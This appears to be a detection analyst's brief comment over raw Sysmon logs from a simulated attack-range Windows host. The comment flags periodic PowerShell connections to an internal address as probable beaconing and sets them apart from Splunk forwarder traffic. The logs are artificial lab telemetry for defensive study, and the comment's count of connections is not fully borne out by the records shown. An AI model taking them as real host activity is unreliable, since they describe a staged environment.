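On this sample both destinations come out periodic: powershell.exe under ATTACKRANGE\REED_SCHMIDT reaches 10.0.1.16:443 five times with gaps of roughly four to six seconds, and streamfwd.exe under SYSTEM reaches 10.0.1.12:8000 every six seconds. Only the first is escalated; in production the allowlist would key on the agent's image hash rather than on the account, since the page's Event ID 1 records carry MD5, SHA256 and IMPHASH for every Splunk binary.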
10341000x800000000000000035084966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.413{B81B27B7-4ED8-613A-4F90-03000000C801}52566824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.376{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119A43B268F7532170DB175AC6551815,SHA256=8F7A2565FEFC97866EBFEDB05B17ED1213251C65CEE05866AB98545D64630DE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:44.260{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4ED8-613A-4F90-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:13.165{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.150{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22BC9C692AF0A1C04B98E6F37BA2470E,SHA256=9B33286D5A9F65326C446369C835ACF8DAAA565B7F4B3CE92F948D53CD270533,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.536{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56688-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF780A266475B26DF45F1F93A4F49B0B,SHA256=1DF7CC580AEEABAF877163613D421FA80FCF30A6F6F54F30CA0EA2919B324FC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DF46D507CFE146215792D3C267B62A8,SHA256=71EEDC96EA44BAF96C8A41C3BFB2AF03D0A3E90474617CA8F3C241C2743A0A8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F98F95645F495F4A4EC85A598B3E915F,SHA256=81D8DD82A012C70D4673031C666E7628856C8CDC5AD3599C681AC5A0947CFDC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:15.185{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82064DD402016AC91DA89239FB01D0D9,SHA256=706A9606BF2455B9E234C8F2BD1B04B490351C2E0FB13D5661F4D44BEFD5368B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:16.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2195626F987E7F6BD106485A569BC174,SHA256=0968291F832AE72F4EDBCE57DB1FA7D0EBC09F20C4A64C60441FEF816D543E5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:17.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D0F79BF0DC035B137EBC039B4EEDC8,SHA256=6BE819A9561D15CD48011ADD3670FA7F20683D854D4FBF389B663683E800B937,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:18.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3E519B79672BE0D1C06BC32F7A0F00EE,SHA256=63D2397E51D0E1A1DC911E040DB247BE52EBDEAC1EC4D7FD46E0C42D6F342E7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:18.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6F443DB9C676DB4E87114E7C0A431C,SHA256=6E8F74506C78ED5416C0009EE41B8FE1AC98109369C4449C49A030417E7CB405,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035085049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:42.203{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56689-false10.0.1.12-8000- 354300x800000000000000035085053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.552{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56690-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:19.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03E7DE40AC92633F0224CA7109E56C4D,SHA256=5D9AB7D035AC7DCD277C7DD290D2BE724C3A9AAD2B2C738166BAD6DC5666B918,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:20.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193ED7AB061E899B0DD9564462A6A052,SHA256=673DF3AE1BE61035FE1C420B60605BEBFCA3F72F9A112B4D60276106DF2721A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:21.494{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E1C0DA4B555B6F9C95953BC2F3C56F,SHA256=58DE4A77DB20F19DFE3714EF68A9A6AF21B055D152A10FA9D00CCDECCF890EB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:22.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04B343217A4B671ACDD17F0F649E8888,SHA256=5092BD197386FD8096A9F8E07321E406D34CB08F72C70BFA58C6F4DA238A94A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:23.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D48DAED0D36FFF2477D756D44A6171FE,SHA256=D4D870C2CDE4334AE33E2EF7343382875302D3BE21A375E8D47DFCEECACA97BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:48.116{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56691-false10.0.1.12-8000- 23542300x800000000000000035085060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:24.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=29B601C5F49BFD4C38C4135C53C4FCE8,SHA256=046F8A05EB731C40CE5F5ACE2C14E315E312A13E96174F78D3EC67733FCCA8D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:24.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9C3D66FB885B7E695C7D2C346DFD746,SHA256=CEBCFF2009F5F13868EB76C5A211C10E596D06B54AC7654BE8B4909B27F858ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:25.576{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8714EF1E57E2B5A565910B6DB0B88B,SHA256=7E6C75964301EE9F0AD8A2F3D1BA135D1BC2CEA4AF3268DB083628D83B765EF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:49.564{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56692-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 
23542300x800000000000000035085063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:26.591{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=887127599D54D429420775CD7B265492,SHA256=BEE90F45F7446C5602D1207C9E32CFEC06301E3EB453BCA5B4CBA741DE0CECE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:27.605{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D09F91B2E777A31AF482F465F30ADD6,SHA256=AC28DAA6BBEAB580A98609BB0038DEA52ED252A63FDA250B70716B8ED7D00CE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.970{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.968{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:14:28.968{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.967{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:28.951{B81B27B7-4F04-613A-5490-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 